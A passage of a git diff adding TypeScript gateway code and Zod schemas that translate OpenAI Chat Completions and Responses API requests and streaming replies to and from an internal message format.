walker) ──────── + response_format: z.unknown().optional(), + seed: z.number().optional(), + presence_penalty: z.number().optional(), + frequency_penalty: z.number().optional(), + logit_bias: z.record(z.string(), z.number()).optional(), + user: z.string().optional(), + reasoning_effort: z.enum(["minimal", "low", "medium", "high", "xhigh"]).optional(), + parallel_tool_calls: z.boolean().optional(), + service_tier: z.enum(["auto", "default", "flex", "scale", "priority"]).optional(), + metadata: z.record(z.string(), z.unknown()).optional(), + + // ── Accept-and-ignore passthroughs ───────────────────────────────────── + // Forward acceptance only: validating these would 400 on shapes the + // gateway has no opinion on. The downstream provider does the real check. + logprobs: z.unknown().optional(), + top_logprobs: z.unknown().optional(), + prediction: z.unknown().optional(), + modalities: z.unknown().optional(), + audio: z.unknown().optional(), + store: z.unknown().optional(), + prompt_cache_key: z.unknown().optional(), + safety_identifier: z.unknown().optional(), + n: z.unknown().optional(), + web_search_options: z.unknown().optional(), +}); + +/** + * Public types are sourced from the OpenAI SDK so the gateway stays in + * lock-step with the canonical API surface; the schemas above are runtime + * validators for the subset we actually accept. + */ +export type OpenAIChatRequest = ChatCompletionCreateParams; +export type OpenAIChatMessage = ChatCompletionMessageParam; +export type OpenAIChatToolCall = ChatCompletionMessageToolCall; +export type OpenAIChatTool = ChatCompletionTool; +export type OpenAIChatToolChoice = ChatCompletionToolChoiceOption; +export type OpenAIChatContentPart = ChatCompletionContentPart; diff --git a/packages/ai/src/providers/openai-chat-server.ts b/packages/ai/src/providers/openai-chat-server.ts new file mode 100644 index 000000000..2dabd9d02 --- /dev/null +++ b/packages/ai/src/providers/openai-chat-server.ts @@ -0,0 +1,628 @@ +import { randomUUID } from "node:crypto"; +import { resolvePromptCacheKey } from "../auth-gateway/http"; +/** + * Parsed inbound OpenAI chat-completions request, ready to feed into pi-ai + * `stream(model, context, options)`. + */ +import type { AuthGatewayParsedRequest as ParsedRequest } from "../auth-gateway/types"; +import type { + AssistantMessage, + AssistantMessageEventStream, + Context, + ImageContent, + Message, + ServiceTier, + StopReason, + TextContent, + Tool, + ToolCall, + ToolResultMessage, + TSchema, +} from "../types"; +import { + type OpenAIChatContentPart, + type OpenAIChatMessage, + type OpenAIChatTool, + type OpenAIChatToolCall, + type OpenAIChatToolChoice, + openaiChatRequestSchema, +} from "./openai-chat-server-schema"; + +export type { ParsedRequest }; + +type ReasoningEffort = NonNullable<ParsedRequest["options"]["reasoning"]>; + +function isReasoningEffort(value: unknown): value is ReasoningEffort { + return value === "minimal" || value === "low" || value === "medium" || value === "high" || value === "xhigh"; +} + +function isServiceTier(value: unknown): value is ServiceTier { + return value === "auto" || value === "default" || value === "flex" || value === "scale" || value === "priority"; +} + +// --------------------------------------------------------------------------- +// parseRequest +// --------------------------------------------------------------------------- + +export function parseRequest(body: unknown, headers?: Headers): ParsedRequest { + // Header capture is centralized in `auth-gateway/server.ts` (allow-listed + // headers like openai-organization/openai-project/openai-beta/x-stainless-* + // land on `options.headers` automatically). We consult `headers` here too + // for `resolvePromptCacheKey` to pull a cache identity out of inbound + // vendor-neutral headers when the body doesn't carry one. + const parsed = openaiChatRequestSchema.safeParse(body); + if (!parsed.success) { + throw new Error(`openai-chat: ${parsed.error.message}`); + } + const data = parsed.data; + + const now = Date.now(); + const systemParts: string[] = []; + const messages: Message[] = []; + + for (const m of data.messages as OpenAIChatMessage[]) { + switch (m.role) { + case "system": { + const text = stringifyContent(m.content); + if (text.length > 0) systemParts.push(text); + break; + } + case "developer": + messages.push({ role: "developer", content: parseUserLikeContent(m.content), timestamp: now }); + break; + case "user": + messages.push({ role: "user", content: parseUserLikeContent(m.content), timestamp: now }); + break; + case "assistant": + messages.push( + buildAssistantMessage( + (m.content ?? undefined) as string | OpenAIChatContentPart[] | undefined, + m.tool_calls, + data.model, + now, + ), + ); + break; + case "tool": + pushToolResultMessages(messages, m.content, m.tool_call_id, undefined, now); + break; + case "function": { + // Legacy `function` role (pre-tools API): the message carries the tool's + // name on `name` and its output on `content`. Translate to a canonical + // `toolResult` with a synthetic id (no original id on the wire). + const fn = m as { role: "function"; name: string; content: string | null }; + pushToolResultMessages(messages, fn.content ?? "", undefined, fn.name, now); + break; + } + } + } + + const tools = data.tools ? buildTools(data.tools as OpenAIChatTool[]) : undefined; + + const context: Context = { + messages, + ...(systemParts.length > 0 ? { systemPrompt: [systemParts.join("\n\n")] } : {}), + ...(tools ? { tools } : {}), + }; + + // Prefer max_completion_tokens (newer) over max_tokens. + const maxOutputTokens = data.max_completion_tokens ?? data.max_tokens; + const stopSequences = normalizeStop(data.stop); + // Schema accepts the Anthropic-style {type:'tool', name} variant that the SDK + // union doesn't model; the normalizer collapses it to a plain name lookup. + const toolChoice = normalizeToolChoice(data.tool_choice as Parameters<typeof normalizeToolChoice>[0]); + const includeStreamingUsage = data.stream_options?.include_usage === true; + + // `includeStreamingUsage` is the one genuinely-opaque flag — the streaming + // encoder reads it later off `options.extra`. Everything else now lives on + // a typed field; `extra` stays undefined when only typed values are set. + const extra: Record<string, unknown> = {}; + let hasExtra = false; + if (includeStreamingUsage) { + extra.includeStreamingUsage = true; + hasExtra = true; + } + + const options: ParsedRequest["options"] = {}; + if (maxOutputTokens !== undefined) options.maxOutputTokens = maxOutputTokens; + if (data.temperature !== undefined) options.temperature = data.temperature; + if (data.top_p !== undefined) options.topP = data.top_p; + if (stopSequences) options.stopSequences = stopSequences; + if (toolChoice !== undefined) options.toolChoice = toolChoice; + if (data.presence_penalty !== undefined) options.presencePenalty = data.presence_penalty; + if (data.frequency_penalty !== undefined) options.frequencyPenalty = data.frequency_penalty; + if (data.seed !== undefined) options.seed = data.seed; + if (data.logit_bias !== undefined) options.logitBias = data.logit_bias; + if (data.user !== undefined) options.user = data.user; + if (data.response_format !== undefined) options.responseFormat = data.response_format; + if (data.parallel_tool_calls !== undefined) options.parallelToolCalls = data.parallel_tool_calls; + if (data.reasoning_effort !== undefined && isReasoningEffort(data.reasoning_effort)) { + options.reasoning = data.reasoning_effort; + } + if (data.service_tier !== undefined && isServiceTier(data.service_tier)) { + options.serviceTier = data.service_tier; + } + if (data.metadata !== undefined) options.metadata = data.metadata; + const cacheKey = resolvePromptCacheKey(body, headers); + if (cacheKey !== undefined) options.promptCacheKey = cacheKey; + if (hasExtra) options.extra = extra; + + return { + modelId: data.model, + context, + stream: data.stream === true, + options, + }; +} + +function stringifyContent(content: string | OpenAIChatContentPart[] | undefined): string { + if (content === undefined) return ""; + if (typeof content === "string") return content; + const out: string[] = []; + for (const part of content) { + if (part.type === "text") out.push(part.text); + } + return out.join(""); +} + +function parseUserLikeContent( + content: string | OpenAIChatContentPart[] | undefined, +): string | (TextContent | ImageContent)[] { + if (content === undefined) return ""; + if (typeof content === "string") return content; + const parts: (TextContent | ImageContent)[] = []; + for (const part of content) { + if (part.type === "text") { + parts.push({ type: "text", text: part.text }); + continue; + } + if (part.type !== "image_url") continue; + // input_audio / file / refusal / unknown-type parts are accepted by the + // schema for forward-compat but dropped here — pi-ai's canonical user + // content only models text and image today. + const url = typeof part.image_url === "string" ? part.image_url : part.image_url.url; + const decoded = decodeDataUri(url); + if (decoded) { + parts.push({ type: "image", data: decoded.data, mimeType: decoded.mimeType }); + } else { + // No image fetcher available in the gateway; surface as a text placeholder so + // downstream providers still receive a coherent message. + parts.push({ type: "text", text: `[image: ${url}]` }); + } + } + return parts; +} + +function decodeDataUri(url: string): { data: string; mimeType: string } | undefined { + if (!url.startsWith("data:")) return undefined; + const comma = url.indexOf(","); + if (comma < 0) return undefined; + const header = url.slice(5, comma); + const payload = url.slice(comma + 1); + const isBase64 = header.endsWith(";base64"); + const mimeType = (isBase64 ? header.slice(0, -";base64".length) : header) || "application/octet-stream"; + const data = isBase64 ? payload : Buffer.from(decodeURIComponent(payload), "utf8").toString("base64"); + return { data, mimeType }; +} + +function buildAssistantMessage( + content: string | OpenAIChatContentPart[] | undefined, + toolCalls: OpenAIChatToolCall[] | undefined, + modelId: string, + now: number, +): AssistantMessage { + const parts: AssistantMessage["content"] = []; + const text = stringifyContent(content); + if (text.length > 0) parts.push({ type: "text", text }); + if (toolCalls) { + for (const raw of toolCalls) { + // Schema only accepts type:"function" (or omitted); narrow the SDK + // union here so the custom-tool variant doesn't trip TS. + if (raw.type !== undefined && raw.type !== "function") continue; + const fn = (raw as { function: { name: string; arguments: string } }).function; + const argsStr = fn.arguments; + let args: Record<string, unknown> = {}; + if (argsStr.length > 0) { + try { + const v: unknown = JSON.parse(argsStr); + args = + v && typeof v === "object" && !Array.isArray(v) ? (v as Record<string, unknown>) : { __raw: argsStr }; + } catch { + args = { __raw: argsStr }; + } + } + const call: ToolCall = { type: "toolCall", id: raw.id, name: fn.name, arguments: args }; + parts.push(call); + } + } + return { + role: "assistant", + content: parts, + api: "openai-completions", + provider: "openai", + model: modelId, + usage: { + input: 0, + output: 0, + cacheRead: 0, + cacheWrite: 0, + totalTokens: 0, + cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0, total: 0 }, + }, + stopReason: "stop", + timestamp: now, + }; +} + +/** + * Walk a wire `tool` (or legacy `function`) message into canonical messages. + * Tool-result content may carry images alongside text; pi-ai's + * `ToolResultMessage` accepts both, but most downstream providers ignore + * images on tool results. To mirror Rust's `encode_messages` behavior we + * keep text inside the tool-result message and hoist any image parts into a + * follow-up `user` message so they still reach the model. + */ +function pushToolResultMessages( + messages: Message[], + content: string | OpenAIChatContentPart[] | undefined | null, + toolCallId: string | undefined, + toolName: string | undefined, + now: number, +): void { + const textParts: TextContent[] = []; + const imageParts: ImageContent[] = []; + + if (typeof content === "string") { + if (content.length > 0) textParts.push({ type: "text", text: content }); + } else if (Array.isArray(content)) { + for (const part of content) { + if (part.type === "text") { + textParts.push({ type: "text", text: part.text }); + continue; + } + if (part.type !== "image_url") continue; + const url = typeof part.image_url === "string" ? part.image_url : part.image_url.url; + const decoded = decodeDataUri(url); + if (decoded) { + imageParts.push({ type: "image", data: decoded.data, mimeType: decoded.mimeType }); + } else { + // No fetcher available; degrade gracefully to a text placeholder. + textParts.push({ type: "text", text: `[image: ${url}]` }); + } + } + } + + const toolMsg: ToolResultMessage = { + role: "toolResult", + toolCallId: toolCallId ?? "", + // OpenAI's `tool` role omits the tool name on the wire; the legacy + // `function` role supplies it. Downstream providers tolerate empty. + toolName: toolName ?? "", + content: textParts.length > 0 ? textParts : [{ type: "text", text: "" }], + isError: false, + timestamp: now, + }; + messages.push(toolMsg); + + if (imageParts.length > 0) { + messages.push({ + role: "user", + content: imageParts, + timestamp: now, + }); + } +} + +function buildTools(tools: OpenAIChatTool[]): Tool[] | undefined { + if (tools.length === 0) return undefined; + const out: Tool[] = []; + for (const t of tools) { + if (t.type !== "function") continue; + out.push({ + name: t.function.name, + description: t.function.description ?? "", + parameters: (t.function.parameters ?? {}) as Record<string, unknown> as TSchema, + }); + } + return out; +} + +function normalizeStop(value: string | string[] | undefined): string[] | undefined { + if (value === undefined) return undefined; + if (typeof value === "string") return [value]; + return value.length > 0 ? value : undefined; +} + +function normalizeToolChoice(value: OpenAIChatToolChoice | undefined): ParsedRequest["options"]["toolChoice"] { + if (value === undefined) return undefined; + if (value === "auto" || value === "none" || value === "required") return value; + if (typeof value === "object" && value !== null) { + // OpenAI canonical: { type: 'function', function: { name } } + if ("function" in value && value.function) return { name: value.function.name }; + // Anthropic-style passthrough (schema-allowed): { type: 'tool', name } + const anthropicLike = value as unknown as { type?: string; name?: string }; + if (anthropicLike.type === "tool" && typeof anthropicLike.name === "string") { + return { name: anthropicLike.name }; + } + } + return undefined; +} + +// --------------------------------------------------------------------------- +// encodeResponse (non-streaming) +// --------------------------------------------------------------------------- + +export function encodeResponse(message: AssistantMessage, requestedModelId: string): Record<string, unknown> { + const { text, reasoning, toolCalls } = flattenAssistant(message); + + const responseMessage: Record<string, unknown> = { + role: "assistant", + content: text.length > 0 ? text : null, + // pi-ai does not surface real refusals yet; emit `null` so SDKs that + // probe `.refusal` see the documented field shape rather than missing. + refusal: null, + }; + if (reasoning.length > 0) { + // DeepSeek-style / o-series reasoning channel. + responseMessage.reasoning_content = reasoning; + } + if (toolCalls.length > 0) { + responseMessage.tool_calls = toolCalls.map(tc => ({ + id: tc.id, + type: "function", + function: { name: tc.name, arguments: stringifyArgs(tc.arguments) }, + })); + } + + return { + id: makeId(), + object: "chat.completion", + created: Math.floor(Date.now() / 1000), + model: requestedModelId, + // Real OpenAI always emits this key, even when the value is null. Mirror + // the contract so probing SDKs do not throw on a missing field. + system_fingerprint: null, + choices: [ + { + index: 0, + message: responseMessage, + finish_reason: mapFinishReason(message.stopReason, toolCalls.length > 0), + logprobs: null, + }, + ], + usage: buildUsage(message), + }; +} + +function buildUsage(message: AssistantMessage): Record<string, unknown> { + const promptTokens = message.usage.input + message.usage.cacheRead + message.usage.cacheWrite; + const usage: Record<string, unknown> = { + prompt_tokens: promptTokens, + completion_tokens: message.usage.output, + total_tokens: promptTokens + message.usage.output, + prompt_tokens_details: { cached_tokens: message.usage.cacheRead }, + }; + if (message.usage.reasoningTokens !== undefined) { + usage.completion_tokens_details = { reasoning_tokens: message.usage.reasoningTokens }; + } + return usage; +} + +function flattenAssistant(message: AssistantMessage): { + text: string; + reasoning: string; + toolCalls: ToolCall[]; +} { + let text = ""; + let reasoning = ""; + const toolCalls: ToolCall[] = []; + for (const part of message.content) { + switch (part.type) { + case "text": + text += part.text; + break; + case "thinking": + reasoning += part.thinking; + break; + case "redactedThinking": + // Opaque blob — surface verbatim on the reasoning channel so the + // concatenation round-trips through clients that just echo it. + reasoning += part.data; + break; + case "toolCall": + toolCalls.push(part); + break; + } + } + return { text, reasoning, toolCalls }; +} + +function isOnlyRaw(args: Record<string, unknown>): boolean { + for (const k in args) { + if (k !== "__raw") return false; + } + return true; +} + +function stringifyArgs(args: Record<string, unknown>): string { + // `__raw` is our fallback marker for un-parseable inbound args; preserve it verbatim on the way out. + if (typeof args.__raw === "string" && isOnlyRaw(args)) return args.__raw; + try { + return JSON.stringify(args); + } catch { + return "{}"; + } +} + +function mapFinishReason(reason: StopReason, hasToolCalls: boolean): string { + if (reason === "toolUse" || (hasToolCalls && reason === "stop")) return "tool_calls"; + if (reason === "length") return "length"; + // pi-ai's StopReason does not currently carry a content-filter signal; + // when it does, map it to "content_filter" here. + return "stop"; +} + +function makeId(): string { + return `chatcmpl-${randomUUID()}`; +} + +// --------------------------------------------------------------------------- +// encodeStream (SSE) +// --------------------------------------------------------------------------- + +export function encodeStream( + events: AssistantMessageEventStream, + requestedModelId: string, + options?: ParsedRequest["options"], +): ReadableStream<Uint8Array> { + const encoder = new TextEncoder(); + const id = makeId(); + const created = Math.floor(Date.now() / 1000); + const includeUsage = options?.extra?.includeStreamingUsage === true; + + const baseChunk = (delta: Record<string, unknown>, finishReason: string | null) => ({ + id, + object: "chat.completion.chunk", + created, + model: requestedModelId, + system_fingerprint: null, + choices: [{ index: 0, delta, finish_reason: finishReason, logprobs: null }], + ...(includeUsage ? { usage: null } : {}), + }); + + const writeSse = (controller: ReadableStreamDefaultController<Uint8Array>, payload: unknown): void => { + controller.enqueue(encoder.encode(`data: ${JSON.stringify(payload)}\n\n`)); + }; + + const writeUsage = (controller: ReadableStreamDefaultController<Uint8Array>, message: AssistantMessage): void => { + writeSse(controller, { + id, + object: "chat.completion.chunk", + created, + model: requestedModelId, + system_fingerprint: null, + choices: [], + usage: buildUsage(message), + }); + }; + + return new ReadableStream<Uint8Array>({ + async start(controller) { + // contentIndex (from pi-ai events) -> tool_calls index on the wire. + const toolIndexByContentIndex = new Map<number, number>(); + let nextToolIndex = 0; + let hasToolCalls = false; + let finishReason: string = "stop"; + + try { + // Initial role chunk. + writeSse(controller, baseChunk({ role: "assistant" }, null)); + + for await (const event of events) { + switch (event.type) { + case "text_delta": + if (event.delta.length > 0) { + writeSse(controller, baseChunk({ content: event.delta }, null)); + } + break; + + case "thinking_delta": + // DeepSeek-style / o-series reasoning channel. Clients that don't + // understand it ignore the unknown delta key. + if (event.delta.length > 0) { + writeSse(controller, baseChunk({ reasoning_content: event.delta }, null)); + } + break; + + case "toolcall_start": { + hasToolCalls = true; + const idx = nextToolIndex++; + toolIndexByContentIndex.set(event.contentIndex, idx); + const partial = event.partial.content[event.contentIndex]; + const call = partial && partial.type === "toolCall" ? partial : undefined; + writeSse( + controller, + baseChunk( + { + tool_calls: [ + { + index: idx, + id: call?.id ?? "", + type: "function", + function: { name: call?.name ?? "", arguments: "" }, + }, + ], + }, + null, + ), + ); + break; + } + + case "toolcall_delta": { + const idx = toolIndexByContentIndex.get(event.contentIndex); + if (idx === undefined) break; + writeSse( + controller, + baseChunk({ tool_calls: [{ index: idx, function: { arguments: event.delta } }] }, null), + ); + break; + } + + case "done": + finishReason = + event.reason === "toolUse" + ? "tool_calls" + : event.reason === "length" + ? "length" + : hasToolCalls + ? "tool_calls" + : "stop"; + writeSse(controller, baseChunk({}, finishReason)); + if (includeUsage) writeUsage(controller, event.message); + controller.enqueue(encoder.encode("data: [DONE]\n\n")); + controller.close(); + return; + + case "error": { + const msg = event.error.errorMessage ?? "stream error"; + writeSse(controller, { error: { message: msg, type: "upstream_error" } }); + controller.close(); + return; + } + + // Drop start / *_start / *_end — chat-completions wire only + // surfaces deltas and the terminal finish_reason. + default: + break; + } + } + + // Stream ended without a terminal `done` (defensive). Close gracefully. + writeSse(controller, baseChunk({}, hasToolCalls ? "tool_calls" : "stop")); + controller.enqueue(encoder.encode("data: [DONE]\n\n")); + controller.close(); + } catch (err) { + const msg = err instanceof Error ? err.message : String(err); + writeSse(controller, { error: { message: msg, type: "upstream_error" } }); + controller.close(); + } + }, + }); +} + +// --------------------------------------------------------------------------- +// formatError +// --------------------------------------------------------------------------- + +/** + * OpenAI chat-completions error envelope: + * `{ error: { message, type } }` + * Matches the shape the official SDK auto-parses into `APIError`. + */ +export function formatError(status: number, type: string, message: string): Response { + return new Response(JSON.stringify({ error: { message, type } }), { + status, + headers: { "Content-Type": "application/json" }, + }); +} diff --git a/packages/ai/src/providers/openai-completions.ts b/packages/ai/src/providers/openai-completions.ts index 26626dc7d..8d044b013 100644 --- a/packages/ai/src/providers/openai-completions.ts +++ b/packages/ai/src/providers/openai-completions.ts @@ -1084,6 +1084,13 @@ function buildParams( if (options?.repetitionPenalty !== undefined) { params.repetition_penalty = options.repetitionPenalty; } + if (options?.stopSequences?.length) { + const seqs = options.stopSequences; + params.stop = seqs.length === 1 ? seqs[0] : seqs.slice(0, 4); + } + if (options?.frequencyPenalty !== undefined) { + params.frequency_penalty = options.frequencyPenalty; + } if (shouldSendServiceTier(options?.serviceTier, model.provider)) { params.service_tier = options.serviceTier; } diff --git a/packages/ai/src/providers/openai-responses-server-schema.ts b/packages/ai/src/providers/openai-responses-server-schema.ts new file mode 100644 index 000000000..144853b6b --- /dev/null +++ b/packages/ai/src/providers/openai-responses-server-schema.ts @@ -0,0 +1,290 @@ +/** + * Zod schemas for the OpenAI Responses API request shape we accept on the + * gateway. Mirrors https://platform.openai.com/docs/api-reference/responses. + * + * Unsupported / opaque controls (background/include/metadata/prompt/…) are + * accepted as `z.unknown().optional()` so we silently ignore rather than 400. + * Real clients (codex, openai-python, llm-git) routinely send these and a 400 + * is a worse outcome than dropping them on the floor. + */ +import type { + EasyInputMessage, + ResponseCreateParams, + ResponseFunctionToolCall, + ResponseInputContent, + ResponseInputItem, + ResponseOutputMessage, + ResponseReasoningItem, + Tool as ResponsesTool, +} from "openai/resources/responses/responses"; +import * as z from "zod/v4"; + +// ─── Input content blocks ─────────────────────────────────────────────────── + +const inputTextSchema = z.object({ + type: z.literal("input_text"), + text: z.string(), +}); + +const plainTextSchema = z.object({ + type: z.literal("text"), + text: z.string(), +}); + +const inputImageBlockSchema = z + .object({ + type: z.literal("input_image"), + detail: z.enum(["auto", "low", "high"]).optional(), + image_url: z.string().optional(), + file_id: z.string().optional(), + }) + .refine(v => typeof v.image_url === "string" || typeof v.file_id === "string", { + message: "input_image requires at least one of `image_url` or `file_id`", + }); + +const inputFileBlockSchema = z.object({ + type: z.literal("input_file"), + file_id: z.string().optional(), + filename: z.string().optional(), + file_data: z.string().optional(), +}); + +const outputTextSchema = z.object({ + type: z.literal("output_text"), + text: z.string(), +}); + +const outputRefusalSchema = z.object({ + type: z.literal("refusal"), + refusal: z.string(), +}); + +const summaryTextSchema = z.object({ + type: z.literal("summary_text"), + text: z.string(), +}); + +const reasoningTextSchema = z.object({ + type: z.literal("reasoning_text"), + text: z.string(), +}); + +const inputContentBlockSchema = z.union([ + inputTextSchema, + plainTextSchema, + inputImageBlockSchema, + inputFileBlockSchema, +]); +const outputContentBlockSchema = z.union([outputTextSchema, plainTextSchema, outputRefusalSchema]); + +// ─── Input items ──────────────────────────────────────────────────────────── + +const userMessageItemSchema = z.object({ + type: z.literal("message").optional(), + role: z.union([z.literal("user"), z.literal("developer")]), + content: z.union([z.string(), z.array(inputContentBlockSchema)]).optional(), +}); + +const systemMessageItemSchema = z.object({ + type: z.literal("message").optional(), + role: z.literal("system"), + content: z.union([z.string(), z.array(inputContentBlockSchema)]).optional(), +}); + +const assistantMessageItemSchema = z.object({ + type: z.literal("message").optional(), + role: z.literal("assistant"), + content: z.union([z.string(), z.array(outputContentBlockSchema)]).optional(), +}); + +const reasoningItemSchema = z.object({ + type: z.literal("reasoning"), + id: z.string().optional(), + summary: z.array(summaryTextSchema).optional(), + content: z.array(reasoningTextSchema).optional(), +}); + +const functionCallItemSchema = z.object({ + type: z.literal("function_call"), + id: z.string().optional(), + call_id: z.string().min(1), + name: z.string().min(1), + arguments: z.string().optional(), +}); + +const functionCallOutputItemSchema = z.object({ + type: z.literal("function_call_output"), + call_id: z.string().min(1), + // Codex CLI replays multimodal tool results in array form (text + refusal). + output: z.union([z.string(), z.array(outputContentBlockSchema)]).optional(), +}); + +const customToolCallItemSchema = z.object({ + type: z.literal("custom_tool_call"), + id: z.string().optional(), + call_id: z.string().min(1), + name: z.string().min(1), + // Raw input string — NOT JSON.stringified. apply_patch flow streams a + // freeform body and reading it as JSON would corrupt it. + input: z.string(), +}); + +const customToolCallOutputItemSchema = z.object({ + type: z.literal("custom_tool_call_output"), + call_id: z.string().min(1), + output: z.string(), +}); + +/** + * An input item is one of the union members below. The convenience shape + * `{role, content}` (no `type`) is mapped to "message" before validation in + * the walker — schemas here only handle the canonical {type, ...} forms. + */ +export const inputItemSchema = z.union([ + userMessageItemSchema, + systemMessageItemSchema, + assistantMessageItemSchema, + reasoningItemSchema, + functionCallItemSchema, + functionCallOutputItemSchema, + customToolCallItemSchema, + customToolCallOutputItemSchema, + // Tolerated but not bridged (file_search_call, web_search_call, …). + z.object({ type: z.string() }).loose(), +]); + +// Variant types alias the canonical SDK union members so the walker can +// narrow them cleanly. The convenience "message" shape (no `type` field) maps +// to EasyInputMessage; the explicit form maps to ResponseInputItem.Message. +export type OpenAIResponsesUserItem = EasyInputMessage | ResponseInputItem.Message; +export type OpenAIResponsesSystemItem = EasyInputMessage | ResponseInputItem.Message; +export type OpenAIResponsesAssistantItem = EasyInputMessage | ResponseOutputMessage; +export type OpenAIResponsesReasoningItem = ResponseReasoningItem; +export type OpenAIResponsesFunctionCallItem = ResponseFunctionToolCall; +export type OpenAIResponsesFunctionCallOutputItem = ResponseInputItem.FunctionCallOutput; + +/** Inferred shape of the custom tool call input item (no canonical SDK alias). */ +export type OpenAIResponsesCustomToolCallItem = z.infer<typeof customToolCallItemSchema>; +export type OpenAIResponsesCustomToolCallOutputItem = z.infer<typeof customToolCallOutputItemSchema>; +export type OpenAIResponsesInputImageBlock = z.infer<typeof inputImageBlockSchema>; +export type OpenAIResponsesInputFileBlock = z.infer<typeof inputFileBlockSchema>; +export type OpenAIResponsesOutputRefusalBlock = z.infer<typeof outputRefusalSchema>; + +// ─── Tools ────────────────────────────────────────────────────────────────── + +export const toolSchema = z.object({ + type: z.literal("function"), + name: z.string().min(1), + description: z.string().optional(), + parameters: z.record(z.string(), z.unknown()).optional(), + strict: z.boolean().optional(), +}); + +// Built-in / hosted tool entries (web_search_preview, file_search, …) — accepted +// but skipped by the walker. +const builtinToolSchema = z + .object({ + type: z.string(), + }) + .loose(); + +// ─── Tool choice ──────────────────────────────────────────────────────────── + +const hostedToolType = z.enum([ + "web_search_preview", + "file_search", + "computer_use_preview", + "code_interpreter", + "image_generation", + "mcp", +]); + +const allowedToolEntrySchema = z.object({ + type: z.string(), + name: z.string().optional(), +}); + +export const toolChoiceSchema = z.union([ + z.literal("auto"), + z.literal("none"), + z.literal("required"), + z.object({ + type: z.literal("function"), + name: z.string().min(1), + }), + // Codex apply_patch flow. + z.object({ + type: z.literal("custom"), + name: z.string().min(1), + }), + // Hosted-tool selection (no extra fields). + z.object({ + type: hostedToolType, + }), + // `allowed_tools` — walker treats as auto. + z.object({ + type: z.literal("allowed_tools"), + mode: z.enum(["auto", "required"]), + tools: z.array(allowedToolEntrySchema), + }), +]); + +// ─── Reasoning config ─────────────────────────────────────────────────────── + +export const reasoningConfigSchema = z.object({ + effort: z.string().optional(), + // `none` maps to hideThinkingSummary; auto/concise/detailed mean "show + // summary". pi-ai has no per-level plumbing for the latter — walker logs + // once and treats them as default. + summary: z.enum(["auto", "concise", "detailed", "none"]).optional(), +}); + +// ─── Stop ─────────────────────────────────────────────────────────────────── + +export const stopSchema = z.union([z.string(), z.array(z.string()), z.null()]); + +// ─── Top-level request ────────────────────────────────────────────────────── + +export const openaiResponsesRequestSchema = z.object({ + model: z.string().min(1), + input: z.union([z.string(), z.array(inputItemSchema)]).optional(), + instructions: z.union([z.string(), z.null()]).optional(), + tools: z.array(z.union([toolSchema, builtinToolSchema])).optional(), + tool_choice: toolChoiceSchema.optional(), + max_output_tokens: z.number().optional(), + temperature: z.number().optional(), + top_p: z.number().optional(), + stop: stopSchema.optional(), + stream: z.boolean().optional(), + reasoning: reasoningConfigSchema.optional(), + store: z.boolean().optional(), + previous_response_id: z.string().optional(), + parallel_tool_calls: z.boolean().optional(), + prompt_cache_key: z.string().optional(), + metadata: z.unknown().optional(), + user: z.string().optional(), + service_tier: z.string().optional(), + presence_penalty: z.number().optional(), + frequency_penalty: z.number().optional(), + // Accepted-but-ignored: include `reasoning.encrypted_content` is the canonical + // way to request reasoning replay — silently accept and drop. + background: z.unknown().optional(), + include: z.unknown().optional(), + prompt: z.unknown().optional(), + safety_identifier: z.unknown().optional(), + text: z.unknown().optional(), + top_logprobs: z.unknown().optional(), + truncation: z.unknown().optional(), +}); + +/** + * Public types are sourced from the OpenAI SDK so the gateway stays in + * lock-step with the canonical API surface; the schemas above are runtime + * validators for the subset we actually accept. + */ +export type OpenAIResponsesRequest = ResponseCreateParams; +export type OpenAIResponsesInputItem = ResponseInputItem; +export type OpenAIResponsesTool = ResponsesTool; +export type OpenAIResponsesToolChoice = NonNullable<ResponseCreateParams["tool_choice"]>; +export type OpenAIResponsesInputContent = ResponseInputContent; +export type OpenAIResponsesOutputContent = ResponseOutputMessage["content"][number]; diff --git a/packages/ai/src/providers/openai-responses-server.ts b/packages/ai/src/providers/openai-responses-server.ts new file mode 100644 index 000000000..7fe25b9be --- /dev/null +++ b/packages/ai/src/providers/openai-responses-server.ts @@ -0,0 +1,1183 @@ +/** + * OpenAI Responses HTTP wire-format ↔ omp Context bridge for the auth-gateway. + * + * Inbound: parses `POST /v1/responses` request bodies into a {@link ParsedRequest}. + * Outbound: encodes omp's {@link AssistantMessage} (and event stream) back into + * the documented `response.*` SSE taxonomy or the non-streaming JSON shape. + * + * Spec: https://platform.openai.com/docs/api-reference/responses + * Inverse direction (source-of-truth for item shapes): ../../providers/openai-responses.ts + */ + +import { logger } from "@oh-my-pi/pi-utils"; +import { resolvePromptCacheKey } from "../auth-gateway/http"; +import type { AuthGatewayParsedRequest as ParsedRequest } from "../auth-gateway/types"; +import type { + AssistantMessage, + AssistantMessageEventStream, + Context, + Message, + TextContent, + ThinkingContent, + Tool, + ToolCall, +} from "../types"; +import { + type OpenAIResponsesFunctionCallItem, + type OpenAIResponsesFunctionCallOutputItem, + type OpenAIResponsesInputContent, + type OpenAIResponsesOutputContent, + type OpenAIResponsesReasoningItem, + type OpenAIResponsesTool, + openaiResponsesRequestSchema, +} from "./openai-responses-server-schema"; + +export type { ParsedRequest }; + +// ─── narrow guards ────────────────────────────────────────────────────────── + +function isReasoningEffort(value: unknown): value is NonNullable<ParsedRequest["options"]["reasoning"]> { + return value === "minimal" || value === "low" || value === "medium" || value === "high" || value === "xhigh"; +} + +function isServiceTier(value: unknown): value is NonNullable<ParsedRequest["options"]["serviceTier"]> { + return value === "auto" || value === "default" || value === "flex" || value === "scale" || value === "priority"; +} + +function isObj(v: unknown): v is Record<string, unknown> { + return typeof v === "object" && v !== null && !Array.isArray(v); +} + +function asString(v: unknown): string | undefined { + return typeof v === "string" ? v : undefined; +} + +// ─── id helpers ───────────────────────────────────────────────────────────── + +function uuidNoDashes(): string { + return crypto.randomUUID().replace(/-/g, ""); +} + +function makeRespId(): string { + return `resp_${uuidNoDashes()}`; +} + +function makeMsgId(): string { + return `msg_${uuidNoDashes()}`; +} + +function makeReasoningId(): string { + return `rs_${uuidNoDashes()}`; +} + +function makeFuncCallId(): string { + return `fc_${uuidNoDashes()}`; +} + +function makeCustomCallId(): string { + return `ctc_${uuidNoDashes()}`; +} + +// ─── once-only warnings ───────────────────────────────────────────────────── +// Module-scoped so we don't spam logs once per turn. + +let warnedImageNotSupported = false; +let warnedFileNotSupported = false; +let warnedReasoningSummaryLevel = false; + +// ─── inbound parser helpers ───────────────────────────────────────────────── + +function extractReasoningTextFromItem(item: OpenAIResponsesReasoningItem): string { + // Prefer `summary[]` — mirrors real OpenAI and the openai-responses provider + // which writes the surfaced reasoning summary into `summary[].text`. + 